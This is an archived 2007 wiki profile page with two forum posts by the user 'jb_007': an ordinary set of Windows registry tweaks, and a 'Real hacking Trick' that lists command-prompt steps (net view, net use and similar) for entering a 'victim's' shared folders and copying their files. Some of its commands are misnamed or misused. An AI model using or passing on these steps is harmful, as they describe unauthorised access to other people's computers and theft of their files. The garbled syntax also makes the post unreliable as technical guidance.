jb_007

jb_007 id=
Role: Registered User (what's this?

Registered users can join discussions and leave comments.

Read more about site and user permissions on this site at Wetpaint Central.

)
Member since: Feb 8 2007, 10:54 PM EST
Friends: 4
Compliments: None

Well i am glad i am now memebr of this awesome site !

I read books like HACKING FOR DUMMIES,ETHICAL HAKING,NETWORK SECURITIES, and i came to know others can just rock with our personal system and i am fan of "KELVIN METNIK".so i am delighted to share knowledge to avoid hacking into our personal system where we keep our memories and personal data.mr.Rahul has done a fantastic job by processing such a site.Lets share knowledge and make our world better to live in.....


Latest page update: Feb 24 2007, 5:37 AM EST
Started By Thread Subject Replies Last Post
jb_007 Real hacking Trick by Jb_007 5 Jul 23 2007, 7:47 PM EDT by spyder2536
jb_007
Thread started: Feb 11 2007, 1:29 AM EST  Watch

Well hacking can be done in win xp with its own command [dos] .The steps involves both command syntax as well as third party software… Here how it goes…To interconnect between computers and to transfer data from comp-comp “port” is need i.e just like a gate .what hackers do is try to get into the gate from which the data is transferred ,usually its guarded by what we call “firewall”. umm.so how to get into one way is to get through “file and printer sharing port”. Well now we use third party software to scan the open ports of the victim and get into it through command prompt. ”U R IN “..

Syntax used :

Ipconfig : to scan ip address .or try with winipcfg.
Netstat –A “IP Address” :statistics of a specific ip address of victim.
Net view\\<insert ip_address> : to get the shared resources of victim.
Net use X:\\<ip_address\”shared file\folder name”: syntax to get into victims folder.Some time c:,d:,e, the locals drive may be shared lock for them.

Steps:

1.Run command prompt.
2.ipconfig gives u r computer info includes ip address,dns,subnet,gateway.
3.netstat – A :this will give u all the shared ip address communicating with u rs system.
4.netstat – A <ip_address of victim”> :it will show u his shared folders.
5.nbstat – A “ip address “. :gives hex codes <20> if u see 20 that’s printer sharing enabled.
6.netview\\<ip of victim>.
7. Net use X:\\<ip_address\”shared file\folder name: U R IN.
8.Copy the files from his folder to u r system.Thats it !
25  out of 26 found this valuable. Do you?    
Show Last Reply
jb_007 All About Registry 0 Feb 11 2007, 1:33 AM EST by jb_007
jb_007
Thread started: Feb 11 2007, 1:33 AM EST  Watch
Well try them all :
Change Default Folder Locations
You can change or delete the Windows mandatory locations of folder like My Documents:
1. Open RegEdit
2. Go to HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Shell Folders
3. Change the desired folder location, My Documents is normally list as "Personal"
4. Open the Explorer and rename or create the folder you wish.
To change the desired location of the Program Files folder
1. Go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
2. Change the value of "ProgramFiles", or "ProgramFilesDir"
Now when you install a new program it will default to the new location you have selected.
Change the Registered Change the User Information
You can change the Registered Owner or Registered Organization to anything you want even after Windows is installed.
1) Open RegEdit
2) Got to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion.
3) Change the value of "RegisteredOrganization" or "RegisteredOwner", to what ever you want
Opening a DOS Window to either the Drive or Directory in Explorer
Add the following Registry Keys for a Directory:
HKEY_CLASSES_ROOT\Directory\shell\opennew
@="Dos Prompt in that Directory"
HKEY_CLASSES_ROOT\Directory\shell\opennew\command
@="command.com /k cd %1"
Add or Edit the following Registry Keys for a Drive:
HKEY_CLASSES_ROOT\Drive\shell\opennew
@="Dos Prompt in that Drive"
HKEY_CLASSES_ROOT\Drive\shell\opennew\command
@="command.com /k cd %1"
These will allow you to right click on either the drive or the directory and the option of starting the dos prompt will pop up.
17  out of 17 found this valuable. Do you?